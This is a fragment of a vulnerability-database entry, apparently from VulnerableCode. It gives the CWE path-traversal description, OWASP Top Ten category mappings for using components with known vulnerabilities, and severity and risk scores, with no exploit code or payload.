description	The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

cwe_id	937
name	OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description	Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.

cwe_id	1035
name	OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description	Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.

Exploits

Severity_range_score 9.0 - 10.0

Exploitability 0.5

Weighted_severity 9.0

Risk_score 4.5

Resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g7y6-euhd-jqhh

Vulnerability Instance